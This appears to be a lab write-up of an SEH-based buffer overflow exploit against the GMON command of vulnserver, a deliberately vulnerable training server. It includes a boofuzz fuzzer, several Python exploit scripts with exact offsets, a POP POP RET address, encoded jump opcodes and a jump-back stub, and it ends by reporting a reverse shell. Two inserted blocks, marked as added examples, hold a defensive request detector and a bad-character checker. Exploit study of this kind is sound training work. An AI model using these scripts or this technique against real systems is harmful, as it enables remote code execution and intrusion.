Vulnserver GMON exploit

SEH-based buffer overflow in the GMON command of vulnserver.

Crashing the program!

To fuzz the program we use the following boofuzz script template. It keeps fuzzing the server as long as the server still answers with its banner; once the banner stops arriving, the process has crashed and the script exits.

from boofuzz import *


def get_banner(target, my_logger, session, *args, **kwargs):
    # Called before every test case: as long as the banner still arrives the
    # server is alive. A missing banner means the last payload crashed it.
    banner_template = b"Welcome to Vulnerable Server! Enter HELP for help."
    try:
        banner = target.recv(10000)
    except Exception:
        print("Unable to connect. Target is down. Exiting.")
        exit(1)
    my_logger.log_check('Receiving banner..')
    if banner_template in banner:
        my_logger.log_pass('banner received')
    else:
        my_logger.log_fail('No banner received')
        print("No banner received, exiting..")
        exit(1)


def main():
    session = Session(
        target=Target(
            connection=SocketConnection("192.168.0.109", 9999, proto='tcp')
        ),
        sleep_time=0.5,
    )
    # Setup: "GMON <fuzzed string>\r\n"; only the argument is mutated
    s_initialize(name="Request")
    with s_block("Host-Line"):
        s_static("GMON", name='command name')
        s_delim(" ", fuzzable=False)
        s_string("FUZZ")
        s_delim("\r\n")
    # Fuzzing
    session.connect(s_get("Request"), callback=get_banner)
    session.fuzz()


if __name__ == "__main__":
    main()
No banner received: the program has crashed
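Seen from the defender's side, the crash trigger has two obvious properties: a single command argument thousands of bytes long, and an argument made almost entirely of one repeated byte. The following added example (not code from the post or from vulnserver) runs detection logic for both properties over captured requests, the way a network monitor or a parser of the server's own request log could. The thresholds MAX_ARG_LEN and MIN_RUN_LEN and the sample requests are constructed assumptions, not values taken from the protocol.

```python
# Constructed sample traffic: one raw request payload per client request,
# as a network monitor or the server's own logging might capture it.
SAMPLE_REQUESTS = [
    b"GMON /.:/hello\r\n",                    # normal-looking GMON
    b"HELP\r\n",                              # command without argument
    b"GMON /.:/" + b"A" * 5013,               # the crash payload from the post
    b"TRUN /.:/" + b"B" * 300 + b"\r\n",      # oversized argument to another command
]

MAX_ARG_LEN = 256   # assumption: a sane upper bound for this protocol's arguments
MIN_RUN_LEN = 64    # assumption: a run of one byte this long is filler, not real data


def parse_command(payload):
    """Split '<COMMAND> <argument>' into its two parts (argument may be empty)."""
    line = payload.rstrip(b"\r\n")
    command, _, argument = line.partition(b" ")
    return command.decode("ascii", "replace"), argument


def longest_run(data):
    """Length of the longest run of one repeated byte value in data."""
    best = cur = 0
    prev = None
    for b in data:
        cur = cur + 1 if b == prev else 1
        prev = b
        best = max(best, cur)
    return best


def inspect(payload):
    """Return a list of human-readable findings for one request (empty if clean)."""
    command, argument = parse_command(payload)
    findings = []
    if len(argument) > MAX_ARG_LEN:
        findings.append(f"{command}: argument length {len(argument)} exceeds {MAX_ARG_LEN}")
    run = longest_run(argument)
    if run >= MIN_RUN_LEN:
        findings.append(f"{command}: filler run of {run} identical bytes")
    return findings


def scan(requests):
    """Return {request index: findings} for every request that tripped a check."""
    results = {}
    for i, payload in enumerate(requests):
        findings = inspect(payload)
        if findings:
            results[i] = findings
    return results


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_REQUESTS).items():
        for finding in findings:
            print(f"request {index}: {finding}")
```

The length check alone would already catch the crash payload; the repeated-byte check is the cheaper heuristic to keep on a noisy service, since legitimate arguments rarely contain dozens of identical bytes in a row.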
import socket

host = "192.168.0.109"
port = 9999

# 5013 bytes is the payload size that crashed the server during fuzzing
buffer = b"A" * 5013

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print(s.recv(1024))
s.send(b"GMON /.:/" + buffer)
print(s.recv(1024))
s.close()
Registers overwritten with 0x41 ('A')
SEH chain overwritten with 0x41
import socket

host = "192.168.0.109"
port = 9999

# Original crash payload size = 5013
# SEH Handler Offset = 3519
# nSEH Offset is 3519-4 = 3515
seh = b"BBBB"
nseh = b"CCCC"
buffer = 3515 * b"A"
buffer += nseh
buffer += seh
buffer += b"D" * (5013 - len(buffer))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print(s.recv(1024))
s.send(b"GMON /.:/" + buffer)
s.close()
Bs and Cs successfully placed in the SEH handler and nSEH fields respectively

Checking for bad characters

We send the usual bad-character test array, omitting 0x00 since it is almost always a bad character. The array is placed inside the ‘A’ buffer area, and we check in the debugger whether any of its bytes was corrupted in memory.

No bad characters detected other than 0x00
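The comparison step of that check, as an added example (not code from the post): it builds the 0x01..0xFF test array the text describes and diffs it against the bytes read back from memory, reporting the first byte that was altered or the point at which the copy stopped. Because everything after a mangled byte shifts, only the first mismatch is meaningful; that byte is removed from the array and the round is repeated until the dump matches. The two dumps here are constructed to show both outcomes and say nothing about vulnserver, which, as the post found, only mangles 0x00.

```python
def badchar_array(exclude=(0x00,)):
    """The 0x01..0xFF test array, minus bytes already known to be bad."""
    return bytes(b for b in range(256) if b not in exclude)


def find_bad_chars(sent, dumped):
    """Compare the array we sent with what was read back from memory.

    Returns (offset, byte) for the first sent byte that differs, or that is
    missing because the copy stopped early; None if the dump matches exactly.
    """
    for offset, value in enumerate(sent):
        if offset >= len(dumped) or dumped[offset] != value:
            return offset, value
    return None


SENT = badchar_array()

# Constructed memory dumps (not taken from vulnserver): one intact copy, and
# one where a hypothetical filter stopped copying at the first 0x0a byte.
DUMP_INTACT = SENT
DUMP_TRUNCATED = SENT[:SENT.index(0x0a)]


def report(sent, dumped):
    """One-line verdict for a round of the bad-character check."""
    hit = find_bad_chars(sent, dumped)
    if hit is None:
        return "no bad characters in this round"
    offset, value = hit
    return f"byte 0x{value:02x} at offset {offset} was altered or dropped"


if __name__ == "__main__":
    print(report(SENT, DUMP_INTACT))
    print(report(SENT, DUMP_TRUNCATED))
    # Next round after confirming 0x0a: resend without it
    print(len(badchar_array(exclude=(0x00, 0x0a))), "bytes in the next array")
```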

POP, POP, RET!

We use mona to find an address in the program that holds a POP POP RET sequence, using the command !mona seh.

POP POP RET locations
import socket

host = "192.168.0.109"
port = 9999

# Original crash payload size = 5013
# SEH Handler Offset = 3519
# nSEH Offset is 3519-4 = 3515
seh = b"\x2B\x17\x50\x62"    # POP POP RET address from !mona seh (0x6250172B), little-endian
nseh = b"\xEB\x06\x90\x90"   # jmp short +6 over the SEH record, padded with two NOPs
buffer = b""
buffer += b"A" * 3515
buffer += nseh
buffer += seh
buffer += b"D" * (5013 - len(buffer))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print(s.recv(1024))
s.send(b"GMON /.:/" + buffer)
s.close()
Breakpoint added on POP POP RET memory location
Short Jump

Jumping Back

To jump back we need the exact distance to the beginning of the ‘A’s. The Offset tool gives the difference between ESP and the address of the first ‘A’; that difference is the value added below.

push esp            ; save the current stack pointer
pop eax             ; EAX = ESP
add ax, 0x565       ; add the distance to the first 'A' (16-bit form: add eax, 0x565 would encode with null bytes)
jmp eax             ; continue execution at the start of the 'A's
import socket

host = "192.168.0.109"
port = 9999

seh = b"\x2B\x17\x50\x62"    # POP POP RET address, little-endian
nseh = b"\xEB\x06\x90\x90"   # jmp short +6 over the SEH record, two NOPs
jumpback = b"\x54\x58\x66\x05\x65\x05\xff\xe0"  # push esp; pop eax; add ax, 0x565; jmp eax
buffer = b""
buffer += b"A" * 3515
buffer += nseh
buffer += seh
buffer += jumpback
buffer += b"D" * (5013 - len(buffer))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(b"GMON /.:/" + buffer)
s.close()
EIP is at the memory location where ‘A’s are stored
Got reverse shell!
